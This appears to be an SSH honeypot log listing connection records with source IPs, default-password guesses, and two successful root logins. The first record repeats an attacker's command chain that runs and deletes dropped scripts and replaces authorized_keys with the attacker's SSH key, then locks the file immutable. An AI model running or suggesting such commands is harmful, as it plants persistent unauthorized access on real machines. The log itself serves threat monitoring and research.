[obs-node]:~$ chmod +x clean.sh; sh clean.sh; rm -rf clean.sh; chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr rsa-key-20230629" > ~/.ssh/authorized_keys; chattr +ai ~/.ssh/authorized_keys; uname -a; echo -e "\x61\x75\x74\x68\x5F\x6F\x6B\x0A"
Record ID: 9134307ea2a8
Client Version: SSH-2.0-Go
Engagement Duration: 36.3s
HASSH Fingerprint: 5f904648ee8964bef0e8834012e26003
{
  "id": "9134307ea2a8",
  "src_ip": "130.12.180.51",
  "start_time": "2026-05-16T21:57:13.455903Z",
  "end_time": "2026-05-16T21:57:49.756321Z",
  "duration": "36.3",
  "version": "SSH-2.0-Go",
  "hassh": "5f904648ee8964bef0e8834012e26003",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "P"
  },
  "commands": [
    "chmod +x clean.sh; sh clean.sh; rm -rf clean.sh; chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr rsa-key-20230629\" > ~/.ssh/authorized_keys; chattr +ai ~/.ssh/authorized_keys; uname -a; echo -e \"\\x61\\x75\\x74\\x68\\x5F\\x6F\\x6B\\x0A\""
  ],
  "detailed_commands": [
    {
      "cmd": "chmod +x clean.sh; sh clean.sh; rm -rf clean.sh; chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr rsa-key-20230629\" > ~/.ssh/authorized_keys; chattr +ai ~/.ssh/authorized_keys; uname -a; echo -e \"\\x61\\x75\\x74\\x68\\x5F\\x6F\\x6B\\x0A\"",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [],
  "score": 150,
  "tags": [
    "COMMANDS RUN",
    "SUCCESSFUL LOGIN",
    "RECONNAISSANCE",
    "DATA THEFT"
  ]
}
103.242.3.105
2026-05-16 21:57:08.336015 UTC
SUCCESSFUL LOGIN SCORE: 50

Credential acceptance event recorded. Target authentication: root / P

Record ID: 5a02a87b7799
Client Version: SSH-2.0-libssh2_1.11.1
Engagement Duration: 4.4s
HASSH Fingerprint: 19532158b559096b89b1a5f7d17175b2
{
  "id": "5a02a87b7799",
  "src_ip": "103.242.3.105",
  "start_time": "2026-05-16T21:57:08.336015Z",
  "end_time": "2026-05-16T21:57:12.766818Z",
  "duration": "4.4",
  "version": "SSH-2.0-libssh2_1.11.1",
  "hassh": "19532158b559096b89b1a5f7d17175b2",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "P"
  },
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 50,
  "tags": [
    "SUCCESSFUL LOGIN"
  ]
}
103.242.3.105
2026-05-16 21:56:21.933806 UTC
FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: orangepi

Record ID: 98994c057fb1
Client Version: SSH-2.0-libssh2_1.11.1
Engagement Duration: 6.3s
HASSH Fingerprint: 19532158b559096b89b1a5f7d17175b2
{
  "id": "98994c057fb1",
  "src_ip": "103.242.3.105",
  "start_time": "2026-05-16T21:56:21.933806Z",
  "end_time": "2026-05-16T21:56:28.186593Z",
  "duration": "6.3",
  "version": "SSH-2.0-libssh2_1.11.1",
  "hassh": "19532158b559096b89b1a5f7d17175b2",
  "attempts": [
    {
      "user": "orangepi",
      "pass": "orangepi"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}
103.242.3.105
2026-05-16 21:55:39.058974 UTC
FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: admin

Record ID: eb859ea166d4
Client Version: SSH-2.0-libssh2_1.11.1
Engagement Duration: 4.1s
HASSH Fingerprint: 19532158b559096b89b1a5f7d17175b2
{
  "id": "eb859ea166d4",
  "src_ip": "103.242.3.105",
  "start_time": "2026-05-16T21:55:39.058974Z",
  "end_time": "2026-05-16T21:55:43.207589Z",
  "duration": "4.1",
  "version": "SSH-2.0-libssh2_1.11.1",
  "hassh": "19532158b559096b89b1a5f7d17175b2",
  "attempts": [
    {
      "user": "admin",
      "pass": "admin"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}
122.176.21.104
2026-05-16 21:49:42.279299 UTC
FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: nobody

Record ID: c2e1915cf436
Client Version: SSH-2.0-OpenSSH_7.4
Engagement Duration: 5.5s
HASSH Fingerprint: acaa53e0a7d7ac7d1255103f37901306
{
  "id": "c2e1915cf436",
  "src_ip": "122.176.21.104",
  "start_time": "2026-05-16T21:49:42.279299Z",
  "end_time": "2026-05-16T21:49:47.769887Z",
  "duration": "5.5",
  "version": "SSH-2.0-OpenSSH_7.4",
  "hassh": "acaa53e0a7d7ac7d1255103f37901306",
  "attempts": [
    {
      "user": "nobody",
      "pass": "5555555555"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}
80.94.92.171
2026-05-16 21:48:02.317126 UTC
FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: sol

Record ID: c55b6fbb1a76
Client Version: SSH-2.0-Go
Engagement Duration: 2.5s
HASSH Fingerprint: 16443846184eafde36765c9bab2f4397
{
  "id": "c55b6fbb1a76",
  "src_ip": "80.94.92.171",
  "start_time": "2026-05-16T21:48:02.317126Z",
  "end_time": "2026-05-16T21:48:04.834100Z",
  "duration": "2.5",
  "version": "SSH-2.0-Go",
  "hassh": "16443846184eafde36765c9bab2f4397",
  "attempts": [
    {
      "user": "sol",
      "pass": "1234"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}
80.94.92.171
2026-05-16 21:44:43.529326 UTC
FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: sol

Record ID: fdf9504c5964
Client Version: SSH-2.0-Go
Engagement Duration: 3.5s
HASSH Fingerprint: 16443846184eafde36765c9bab2f4397
{
  "id": "fdf9504c5964",
  "src_ip": "80.94.92.171",
  "start_time": "2026-05-16T21:44:43.529326Z",
  "end_time": "2026-05-16T21:44:47.064044Z",
  "duration": "3.5",
  "version": "SSH-2.0-Go",
  "hassh": "16443846184eafde36765c9bab2f4397",
  "attempts": [
    {
      "user": "sol",
      "pass": "123"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}
80.94.92.171
2026-05-16 21:41:10.473976 UTC
FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: ubuntu

Record ID: 1a67a7be6c14
Client Version: SSH-2.0-Go
Engagement Duration: 3.8s
HASSH Fingerprint: 16443846184eafde36765c9bab2f4397
{
  "id": "1a67a7be6c14",
  "src_ip": "80.94.92.171",
  "start_time": "2026-05-16T21:41:10.473976Z",
  "end_time": "2026-05-16T21:41:14.307815Z",
  "duration": "3.8",
  "version": "SSH-2.0-Go",
  "hassh": "16443846184eafde36765c9bab2f4397",
  "attempts": [
    {
      "user": "ubuntu",
      "pass": "ubuntu"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}
205.210.31.168
2026-05-16 21:40:02.696473 UTC
SCORE: 0

Autonomous probing activity normalized. Remote entity established connection but deferred authentication.

Record ID: ab158d0b646b
Client Version: Unknown
Engagement Duration: 0.3s
{
  "id": "ab158d0b646b",
  "src_ip": "205.210.31.168",
  "start_time": "2026-05-16T21:40:02.696473Z",
  "end_time": "2026-05-16T21:40:02.995555Z",
  "duration": "0.3",
  "version": null,
  "hassh": null,
  "attempts": [],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": []
}
80.94.92.171
2026-05-16 21:37:40.426782 UTC
FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: sol

Record ID: 730355cda262
Client Version: SSH-2.0-Go
Engagement Duration: 2.9s
HASSH Fingerprint: 16443846184eafde36765c9bab2f4397
{
  "id": "730355cda262",
  "src_ip": "80.94.92.171",
  "start_time": "2026-05-16T21:37:40.426782Z",
  "end_time": "2026-05-16T21:37:43.327036Z",
  "duration": "2.9",
  "version": "SSH-2.0-Go",
  "hassh": "16443846184eafde36765c9bab2f4397",
  "attempts": [
    {
      "user": "sol",
      "pass": "sol"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}